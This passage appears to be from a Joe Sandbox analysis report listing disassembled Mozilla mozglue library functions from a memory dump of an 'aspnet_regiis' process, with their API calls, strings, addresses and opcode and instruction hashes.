                                                                                                                                                                    • Opcode Fuzzy Hash: e02bd38c299d1f43c0aada6eb4c09a3a329bfcbae63deb6e528e14e59d03f19b
                                                                                                                                                                    • Instruction Fuzzy Hash: D361E1B2A007449BDB218F25C988BDEB7B5BF89308F44852CED9A57701DB31E949CBD1
                                                                                                                                                                    Function 6C7E9F40 Relevance: 9.2, APIs: 6, Instructions: 157timeCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C7E9FDB
                                                                                                                                                                    • free.MOZGLUE(?,?), ref: 6C7E9FF0
                                                                                                                                                                    • free.MOZGLUE(?,?), ref: 6C7EA006
                                                                                                                                                                    • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C7EA0BE
                                                                                                                                                                    • free.MOZGLUE(?,?), ref: 6C7EA0D5
                                                                                                                                                                    • free.MOZGLUE(?,?), ref: 6C7EA0EB
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3402785272.000000006C791000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C790000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3402710092.000000006C790000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402896622.000000006C80D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402949769.000000006C81E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402999327.000000006C822000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c790000_aspnet_regiis.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: free$StampTimeV01@@Value@mozilla@@
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 956590011-0
                                                                                                                                                                    • Opcode ID: 88bab21e2d60986a3542b3e25119656a149e0d23378747d450f3fbdef93acac3
                                                                                                                                                                    • Instruction ID: cd0431479782f0977582b4867fd0616c6c327f9e3e4b798f033b3157a5c6bb50
                                                                                                                                                                    • Opcode Fuzzy Hash: 88bab21e2d60986a3542b3e25119656a149e0d23378747d450f3fbdef93acac3
                                                                                                                                                                    • Instruction Fuzzy Hash: FC61C1765087019FC752CF18C58059AB7F5FF88328F548669E8999BB02E731E986CBC1
                                                                                                                                                                    Function 6C7EDC50 Relevance: 9.1, APIs: 6, Instructions: 104timethreadCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C7EDC60
                                                                                                                                                                    • AcquireSRWLockExclusive.KERNEL32(?,?,?,6C7ED38A,?), ref: 6C7EDC6F
                                                                                                                                                                    • free.MOZGLUE(?,?,?,?,?,6C7ED38A,?), ref: 6C7EDCC1
                                                                                                                                                                    • ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,6C7ED38A,?), ref: 6C7EDCE9
                                                                                                                                                                    • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?,6C7ED38A,?), ref: 6C7EDD05
                                                                                                                                                                    • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000001,?,?,?,6C7ED38A,?), ref: 6C7EDD4A
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3402785272.000000006C791000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C790000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3402710092.000000006C790000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402896622.000000006C80D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402949769.000000006C81E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402999327.000000006C822000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c790000_aspnet_regiis.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ExclusiveLockStampTimeV01@@Value@mozilla@@$AcquireCurrentReleaseThreadfree
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1842996449-0
                                                                                                                                                                    • Opcode ID: 40fb21649571bad7aa7970b8c0075c3a679bb02ef5248d9f76feabbe590f02d7
                                                                                                                                                                    • Instruction ID: acb37783bb6fe1a43968c2205bb41e2f379fa7848263e0c5302a345f40a594af
                                                                                                                                                                    • Opcode Fuzzy Hash: 40fb21649571bad7aa7970b8c0075c3a679bb02ef5248d9f76feabbe590f02d7
                                                                                                                                                                    • Instruction Fuzzy Hash: D6419CB6A00216CFCB40CF99C9859AABBF6FF8C318B154469D905ABB20D771FC00CB90
                                                                                                                                                                    Function 6C7D6590 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 342COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 6C7CFA80: GetCurrentThreadId.KERNEL32 ref: 6C7CFA8D
                                                                                                                                                                      • Part of subcall function 6C7CFA80: AcquireSRWLockExclusive.KERNEL32(6C81F448), ref: 6C7CFA99
                                                                                                                                                                    • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C7D6727
                                                                                                                                                                    • ?GetOrAddIndex@UniqueJSONStrings@baseprofiler@mozilla@@AAEIABV?$Span@$$CBD$0PPPPPPPP@@3@@Z.MOZGLUE(?,?,?,?,?,?,?,00000001), ref: 6C7D67C8
                                                                                                                                                                      • Part of subcall function 6C7E4290: memcpy.VCRUNTIME140(?,?,6C7F2003,6C7F0AD9,?,6C7F0AD9,00000000,?,6C7F0AD9,?,00000004,?,6C7F1A62,?,6C7F2003,?), ref: 6C7E42C4
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3402785272.000000006C791000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C790000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3402710092.000000006C790000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402896622.000000006C80D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402949769.000000006C81E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402999327.000000006C822000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c790000_aspnet_regiis.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ExclusiveLock$AcquireCurrentIndex@P@@3@@ReleaseSpan@$$Strings@baseprofiler@mozilla@@ThreadUniquememcpy
                                                                                                                                                                    • String ID: data
                                                                                                                                                                    • API String ID: 511789754-2918445923
                                                                                                                                                                    • Opcode ID: bddff6b76d2220ea69f2a306371ab0660cf95b0c07a6a1207f2d2fe843c29953
                                                                                                                                                                    • Instruction ID: eda6aa1d2a8ef6e6d9e0f90101cf8e6c016e88af8d12ea5f613af4987a63aeab
                                                                                                                                                                    • Opcode Fuzzy Hash: bddff6b76d2220ea69f2a306371ab0660cf95b0c07a6a1207f2d2fe843c29953
                                                                                                                                                                    • Instruction Fuzzy Hash: AED1D075A083418FD724CF24CA49B9FB7E5AFD5308F108D2EE58987B51DB30A949CB92
                                                                                                                                                                    Function 6C7CF440 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 103fileCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetFileInformationByHandle.KERNEL32(00000000,?), ref: 6C7CF480
                                                                                                                                                                      • Part of subcall function 6C79F100: LoadLibraryW.KERNEL32(shell32,?,6C80D020), ref: 6C79F122
                                                                                                                                                                      • Part of subcall function 6C79F100: GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 6C79F132
                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 6C7CF555
                                                                                                                                                                      • Part of subcall function 6C7A14B0: wcslen.API-MS-WIN-CRT-STRING-L1-1-0(6C7A1248,6C7A1248,?), ref: 6C7A14C9
                                                                                                                                                                      • Part of subcall function 6C7A14B0: memcpy.VCRUNTIME140(?,6C7A1248,00000000,?,6C7A1248,?), ref: 6C7A14EF
                                                                                                                                                                      • Part of subcall function 6C79EEA0: memcpy.VCRUNTIME140(?,?,?), ref: 6C79EEE3
                                                                                                                                                                    • CreateFileW.KERNEL32 ref: 6C7CF4FD
                                                                                                                                                                    • GetFileInformationByHandle.KERNEL32(00000000), ref: 6C7CF523
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3402785272.000000006C791000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C790000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3402710092.000000006C790000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402896622.000000006C80D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402949769.000000006C81E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402999327.000000006C822000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c790000_aspnet_regiis.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: FileHandle$Informationmemcpy$AddressCloseCreateLibraryLoadProcwcslen
                                                                                                                                                                    • String ID: \oleacc.dll
                                                                                                                                                                    • API String ID: 2595878907-3839883404
                                                                                                                                                                    • Opcode ID: ba102e80b17c42ffb634b6d35d0a598f03835573f5be97c74bce8095909e9ba4
                                                                                                                                                                    • Instruction ID: 94356365dac283f7867e2f601eb238319083c4f976e932ea8e4508ec38c04cc2
                                                                                                                                                                    • Opcode Fuzzy Hash: ba102e80b17c42ffb634b6d35d0a598f03835573f5be97c74bce8095909e9ba4
                                                                                                                                                                    • Instruction Fuzzy Hash: 5641B4707087119FE720DF68DA88A9BB7F4AF44318F100A2CF69583650EB30DA49CB93
                                                                                                                                                                    Function 6C7DE020 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 76threadCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 6C7D9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C7A4A68), ref: 6C7D945E
                                                                                                                                                                      • Part of subcall function 6C7D9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C7D9470
                                                                                                                                                                      • Part of subcall function 6C7D9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C7D9482
                                                                                                                                                                      • Part of subcall function 6C7D9420: __Init_thread_footer.LIBCMT ref: 6C7D949F
                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C7DE047
                                                                                                                                                                    • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C7DE04F
                                                                                                                                                                      • Part of subcall function 6C7D94D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C7D94EE
                                                                                                                                                                      • Part of subcall function 6C7D94D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C7D9508
                                                                                                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C7DE09C
                                                                                                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C7DE0B0
                                                                                                                                                                    Strings
                                                                                                                                                                    • [I %d/%d] profiler_get_profile, xrefs: 6C7DE057
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3402785272.000000006C791000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C790000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3402710092.000000006C790000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402896622.000000006C80D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402949769.000000006C81E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402999327.000000006C822000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c790000_aspnet_regiis.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: getenv$free$CurrentInit_thread_footerThread__acrt_iob_func__stdio_common_vfprintf_getpid
                                                                                                                                                                    • String ID: [I %d/%d] profiler_get_profile
                                                                                                                                                                    • API String ID: 1832963901-4276087706
                                                                                                                                                                    • Opcode ID: 554bc3284c8aca6d3213ca1c96bc9de6e18cb298a01b71499f14612810854671
                                                                                                                                                                    • Instruction ID: a1276f1c1a6d6c7b9ba29b267d056351b05ce7b00d433d3912503d4e8540ec61
                                                                                                                                                                    • Opcode Fuzzy Hash: 554bc3284c8aca6d3213ca1c96bc9de6e18cb298a01b71499f14612810854671
                                                                                                                                                                    • Instruction Fuzzy Hash: 4721BE74B001098FDF059F64CA5CAAEBBB5AF8520CF254438E90AA7B41DB31B909C7E1
                                                                                                                                                                    Function 6C7F74A0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 72COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • SetLastError.KERNEL32(00000000), ref: 6C7F7526
                                                                                                                                                                    • __Init_thread_footer.LIBCMT ref: 6C7F7566
                                                                                                                                                                    • __Init_thread_footer.LIBCMT ref: 6C7F7597
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3402785272.000000006C791000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C790000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3402710092.000000006C790000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402896622.000000006C80D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402949769.000000006C81E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402999327.000000006C822000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c790000_aspnet_regiis.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Init_thread_footer$ErrorLast
                                                                                                                                                                    • String ID: UnmapViewOfFile2$kernel32.dll
                                                                                                                                                                    • API String ID: 3217676052-1401603581
                                                                                                                                                                    • Opcode ID: 0ce351a4db85467a67da004cd8d0e15b95ba293e9df5a2117ba58b78815dabfc
                                                                                                                                                                    • Instruction ID: ef5f6df2b33ca3ea8655ba74aaf48a1f689768f1c6337337ad6442e26968efb1
                                                                                                                                                                    • Opcode Fuzzy Hash: 0ce351a4db85467a67da004cd8d0e15b95ba293e9df5a2117ba58b78815dabfc
                                                                                                                                                                    • Instruction Fuzzy Hash: 26210331704583ABCB258FA88A9DE5933F6EB97339B00493DE42947F40C720A802C6D2
                                                                                                                                                                    Function 6C7FA7A0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 43stringCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • EnterCriticalSection.KERNEL32(6C81F770,-00000001,?,6C80E330,?,6C7BBDF7), ref: 6C7FA7AF
                                                                                                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,accelerator.dll,?,6C7BBDF7), ref: 6C7FA7C2
                                                                                                                                                                    • moz_xmalloc.MOZGLUE(00000018,?,6C7BBDF7), ref: 6C7FA7E4
                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(6C81F770), ref: 6C7FA80A
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3402785272.000000006C791000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C790000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3402710092.000000006C790000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402896622.000000006C80D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402949769.000000006C81E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402999327.000000006C822000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c790000_aspnet_regiis.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CriticalSection$EnterLeavemoz_xmallocstrcmp
                                                                                                                                                                    • String ID: accelerator.dll
                                                                                                                                                                    • API String ID: 2442272132-2426294810
                                                                                                                                                                    • Opcode ID: d006cdffdfdf0974cfc7742753c502be2351cb8b28d2f0d42a5eec974d072fda
                                                                                                                                                                    • Instruction ID: 0aa340f60797ff1ddb14220d432d3846543765fc8fb700af2cebf79cf3fe92d1
                                                                                                                                                                    • Opcode Fuzzy Hash: d006cdffdfdf0974cfc7742753c502be2351cb8b28d2f0d42a5eec974d072fda
                                                                                                                                                                    • Instruction Fuzzy Hash: 2501DFB07003449FAB14CF59D9C5C217BF8FB9A328700887AE8098BB01DB709800CBA1
                                                                                                                                                                    Function 6C7FC410 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • LoadLibraryW.KERNEL32(ntdll.dll,?,6C7FC0E9), ref: 6C7FC418
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,NtQueryVirtualMemory), ref: 6C7FC437
                                                                                                                                                                    • FreeLibrary.KERNEL32(?,6C7FC0E9), ref: 6C7FC44C
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3402785272.000000006C791000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C790000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3402710092.000000006C790000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402896622.000000006C80D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402949769.000000006C81E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402999327.000000006C822000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c790000_aspnet_regiis.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                    • String ID: NtQueryVirtualMemory$ntdll.dll
                                                                                                                                                                    • API String ID: 145871493-2623246514
                                                                                                                                                                    • Opcode ID: b44b859badef2bc4f2ea521ae4f9066b4cbaa72bb51c98691f95e49dc0d94374
                                                                                                                                                                    • Instruction ID: d4354656f9983eb27fa308cee05153a9cf50fcb768d2f3be87a0aa39a0115edc
                                                                                                                                                                    • Opcode Fuzzy Hash: b44b859badef2bc4f2ea521ae4f9066b4cbaa72bb51c98691f95e49dc0d94374
                                                                                                                                                                    • Instruction Fuzzy Hash: A9E092B46053139BDB30AB759A0A7217FF8A75620DF004A36AA18D2F10EBB0D012CA90
                                                                                                                                                                    Function 6C7F75B0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • LoadLibraryW.KERNEL32(ntdll.dll,?,6C7F748B,?), ref: 6C7F75B8
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,RtlNtStatusToDosError), ref: 6C7F75D7
                                                                                                                                                                    • FreeLibrary.KERNEL32(?,6C7F748B,?), ref: 6C7F75EC
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3402785272.000000006C791000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C790000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3402710092.000000006C790000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402896622.000000006C80D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402949769.000000006C81E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402999327.000000006C822000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c790000_aspnet_regiis.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                    • String ID: RtlNtStatusToDosError$ntdll.dll
                                                                                                                                                                    • API String ID: 145871493-3641475894
                                                                                                                                                                    • Opcode ID: 101e447fefcafa44e3a86cc91004d09219505d5c2354e6f5eca2c1616ae0b6dd
                                                                                                                                                                    • Instruction ID: 4137a3056a0593b80eda841fb06a6e9c07bac7b3b068f978032fbb1fb4e50d3c
                                                                                                                                                                    • Opcode Fuzzy Hash: 101e447fefcafa44e3a86cc91004d09219505d5c2354e6f5eca2c1616ae0b6dd
                                                                                                                                                                    • Instruction Fuzzy Hash: F2E09AB1604343ABDB219BA2D98A7117AF8E75721CF108835A915D2F10DB749092CF90
                                                                                                                                                                    Function 6C7F7600 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • LoadLibraryW.KERNEL32(ntdll.dll,?,6C7F7592), ref: 6C7F7608
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,NtUnmapViewOfSection), ref: 6C7F7627
                                                                                                                                                                    • FreeLibrary.KERNEL32(?,6C7F7592), ref: 6C7F763C
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3402785272.000000006C791000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C790000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3402710092.000000006C790000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402896622.000000006C80D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402949769.000000006C81E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402999327.000000006C822000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c790000_aspnet_regiis.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                    • String ID: NtUnmapViewOfSection$ntdll.dll
                                                                                                                                                                    • API String ID: 145871493-1050664331
                                                                                                                                                                    • Opcode ID: 41b484e7e23f03c6f99e599a7868c2a56339125611bcb4135f8136fda495c2c9
                                                                                                                                                                    • Instruction ID: 858ca1499b1c217db6744c943d3a4d74dc1c6b8e27905efb82da5c65f3661c1c
                                                                                                                                                                    • Opcode Fuzzy Hash: 41b484e7e23f03c6f99e599a7868c2a56339125611bcb4135f8136fda495c2c9
                                                                                                                                                                    • Instruction Fuzzy Hash: F5E09AB06047839BDF215FE6994A7157AF8E76735DF008935E909D2F10D7709051CB94
                                                                                                                                                                    Function 6C7FBE50 Relevance: 7.7, APIs: 5, Instructions: 163memoryCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • memset.VCRUNTIME140(?,00000000,?,?,6C7FBE49), ref: 6C7FBEC4
                                                                                                                                                                    • RtlCaptureStackBackTrace.NTDLL ref: 6C7FBEDE
                                                                                                                                                                    • memset.VCRUNTIME140(00000000,00000000,-00000008,?,6C7FBE49), ref: 6C7FBF38
                                                                                                                                                                    • RtlReAllocateHeap.NTDLL ref: 6C7FBF83
                                                                                                                                                                    • RtlFreeHeap.NTDLL ref: 6C7FBFA6
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3402785272.000000006C791000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C790000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3402710092.000000006C790000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402896622.000000006C80D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402949769.000000006C81E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402999327.000000006C822000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c790000_aspnet_regiis.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Heapmemset$AllocateBackCaptureFreeStackTrace
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2764315370-0
                                                                                                                                                                    • Opcode ID: 6abb8d38cdfd5d9679ba322c35cf3bc57a227df297a7b4c65f2eed7e5b100f28
                                                                                                                                                                    • Instruction ID: a114ff74839e69c59a798c7fc060f82a99634305db92ebb26c2844fa96f51872
                                                                                                                                                                    • Opcode Fuzzy Hash: 6abb8d38cdfd5d9679ba322c35cf3bc57a227df297a7b4c65f2eed7e5b100f28
                                                                                                                                                                    • Instruction Fuzzy Hash: 71517071A002058FE714CF69CEC0BAAB7A6FF84314F298639D525A7B55D730F9078B91
                                                                                                                                                                    Function 6C7E8E00 Relevance: 7.6, APIs: 6, Instructions: 147COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001,?,?,6C7DB58D,?,?,?,?,?,?,?,6C80D734,?,?,?,6C80D734), ref: 6C7E8E6E
                                                                                                                                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,?,6C7DB58D,?,?,?,?,?,?,?,6C80D734,?,?,?,6C80D734), ref: 6C7E8EBF
                                                                                                                                                                    • free.MOZGLUE(?,?,?,?,6C7DB58D,?,?,?,?,?,?,?,6C80D734,?,?,?), ref: 6C7E8F24
                                                                                                                                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,?,6C7DB58D,?,?,?,?,?,?,?,6C80D734,?,?,?,6C80D734), ref: 6C7E8F46
                                                                                                                                                                    • free.MOZGLUE(?,?,?,?,6C7DB58D,?,?,?,?,?,?,?,6C80D734,?,?,?), ref: 6C7E8F7A
                                                                                                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,6C7DB58D,?,?,?,?,?,?,?,6C80D734,?,?,?), ref: 6C7E8F8F
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3402785272.000000006C791000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C790000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3402710092.000000006C790000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402896622.000000006C80D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402949769.000000006C81E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402999327.000000006C822000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c790000_aspnet_regiis.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: freemalloc
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3061335427-0
                                                                                                                                                                    • Opcode ID: 282f7f30398015b8b2cf74a96ff423f471592cc2b289753a25643e737bf09700
                                                                                                                                                                    • Instruction ID: bc75c9114ef722e644473d0f0ff3fa86a188b83859840370eaeae26d5faf38a7
